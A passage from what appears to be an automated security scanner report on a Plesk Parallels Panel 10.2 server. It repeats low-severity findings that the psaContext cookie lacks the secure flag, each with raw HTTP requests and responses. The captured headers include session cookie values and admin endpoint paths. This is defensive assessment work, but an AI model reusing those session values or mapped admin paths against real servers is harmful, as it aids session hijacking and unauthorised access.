HTTP/1.1 200 OK Last-Modified: Sat, 24 Sep 2011 15:31:23 GMT Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Set-Cookie: psaContext=tools; path=/ Date: Sat, 24 Sep 2011 15:31:23 GMT Server: sw-cp-server Content-Length: 25816
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The following cookie was issued by the application and does not have the secure flag set:
psaContext=tools; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /plesk/reseller@3/backup/local-repository/item@0x1135f24286ba733f8714152a1ddbd67c/restore/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/ Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; reseller_report__report_id=2; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True; backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; reportautolist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9
Response
HTTP/1.1 200 OK Connection: close Last-Modified: Sat, 24 Sep 2011 15:31:23 GMT Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Set-Cookie: psaContext=tools; path=/ Date: Sat, 24 Sep 2011 15:31:24 GMT Server: sw-cp-server Content-Length: 11602
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The following cookie was issued by the application and does not have the secure flag set:
psaContext=tools; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /plesk/reseller@3/backup/local-repository/item@0x59b7fd33ec13d9602b6ca6f628155d30/restore/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/ Cookie: backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools
Response
HTTP/1.1 200 OK Last-Modified: Sat, 24 Sep 2011 15:32:03 GMT Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Set-Cookie: psaContext=tools; path=/ Date: Sat, 24 Sep 2011 15:32:03 GMT Server: sw-cp-server Content-Length: 11595
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The following cookie was issued by the application and does not have the secure flag set:
psaContext=tools; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /plesk/reseller@3/backup/local-repository/item@0xa87588dacfbd85c954970348bf0b8c44/restore/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/ Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; reseller_report__report_id=2; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True; backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; reportautolist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9
Response
HTTP/1.1 200 OK Connection: close Last-Modified: Sat, 24 Sep 2011 15:31:27 GMT Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Set-Cookie: psaContext=tools; path=/ Date: Sat, 24 Sep 2011 15:31:27 GMT Server: sw-cp-server Content-Length: 11607
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The following cookie was issued by the application and does not have the secure flag set:
psaContext=service-plans; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /plesk/reseller@3/backup/local-repository/item@0xbb4f4821ef1d0873e84ab40979c20b5d/restore/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/ Cookie: backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; locale=en-US; PHPSESSID=ed9056e995cbfbee61adf45504108ab4; psaContext=reseller-tools; BarExpanded=True
Response
HTTP/1.1 200 OK Last-Modified: Sat, 24 Sep 2011 15:55:57 GMT Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Set-Cookie: psaContext=service-plans; path=/ Date: Sat, 24 Sep 2011 15:55:58 GMT Server: sw-cp-server Content-Length: 11535
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
4.49. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/upload/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/plesk/reseller@3/backup/local-repository/upload/
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
psaContext=tools; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /plesk/reseller@3/backup/local-repository/upload/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/ Cookie: backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools
Response
HTTP/1.1 200 OK Last-Modified: Sat, 24 Sep 2011 15:31:36 GMT Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Set-Cookie: psaContext=tools; path=/ Date: Sat, 24 Sep 2011 15:31:36 GMT Server: sw-cp-server Content-Length: 7624
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
4.50. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/schedule/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/plesk/reseller@3/backup/schedule/
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
psaContext=tools; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /plesk/reseller@3/backup/schedule/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/ Cookie: locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools
Response
HTTP/1.1 200 OK Last-Modified: Sat, 24 Sep 2011 15:31:46 GMT Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Set-Cookie: psaContext=tools; path=/ Date: Sat, 24 Sep 2011 15:31:46 GMT Server: sw-cp-server Content-Length: 13485
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
4.51. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/task@/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/plesk/reseller@3/backup/task@/
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
psaContext=service-plans; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /plesk/reseller@3/backup/task@/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/ Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; reseller_report__report_id=2; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=home; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True
Response
HTTP/1.1 200 OK Connection: close Last-Modified: Sat, 24 Sep 2011 16:05:23 GMT Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Set-Cookie: psaContext=service-plans; path=/ Date: Sat, 24 Sep 2011 16:05:24 GMT Server: sw-cp-server Content-Length: 12815
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
4.52. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/client@any/traffic/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/plesk/reseller@3/client@any/traffic/
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
psaContext=reseller-tools; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /plesk/reseller@3/client@any/traffic/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/id/3/?context=reseller-tools Cookie: locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=reseller-tools
Response
HTTP/1.1 200 OK Last-Modified: Sat, 24 Sep 2011 15:27:13 GMT Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Set-Cookie: psaContext=reseller-tools; path=/ Date: Sat, 24 Sep 2011 15:27:13 GMT Server: sw-cp-server Content-Length: 16453
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
4.53. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/custom-buttons/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/plesk/reseller@3/custom-buttons/
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
psaContext=service-plans; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /plesk/reseller@3/custom-buttons/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/id/3/?context=reseller-tools Cookie: custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=subscriptions
Response
HTTP/1.1 200 OK Last-Modified: Sat, 24 Sep 2011 15:54:59 GMT Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Set-Cookie: psaContext=service-plans; path=/ Date: Sat, 24 Sep 2011 15:54:59 GMT Server: sw-cp-server Content-Length: 10916
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The following cookie was issued by the application and does not have the secure flag set:
psaContext=customers; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /plesk/reseller@3/custom-buttons/custom-button@new/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; reseller_report__report_id=2; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=home; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True; backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9
Response
HTTP/1.1 405 Method Not Allowed Connection: close Last-Modified: Sat, 24 Sep 2011 16:12:29 GMT Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Set-Cookie: psaContext=customers; path=/ Content-Length: 0 Date: Sat, 24 Sep 2011 16:12:29 GMT Server: sw-cp-server
4.55. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/ftp-sessions/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/plesk/reseller@3/ftp-sessions/
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
psaContext=service-plans; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /plesk/reseller@3/ftp-sessions/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/sessions/ Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; reseller_report__report_id=2; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=home; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True
Response
HTTP/1.1 200 OK Connection: close Last-Modified: Sat, 24 Sep 2011 16:05:22 GMT Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Set-Cookie: psaContext=service-plans; path=/ Date: Sat, 24 Sep 2011 16:05:23 GMT Server: sw-cp-server Content-Length: 11352
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
4.56. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/preferencespreviousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/plesk/reseller@3/preferences
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
psaContext=interface-pref; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /plesk/reseller@3/preferences?context=interface-pref HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=650d277c6582dd6296b0d447081dc10c; locale=en-US; psaContext=reseller-tools
Response
HTTP/1.1 200 OK Last-Modified: Sat, 24 Sep 2011 14:16:08 GMT Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Set-Cookie: psaContext=interface-pref; path=/ Date: Sat, 24 Sep 2011 14:16:08 GMT Server: sw-cp-server Content-Length: 7293
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
4.57. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/plesk/reseller@3/report/
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
psaContext=tools; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
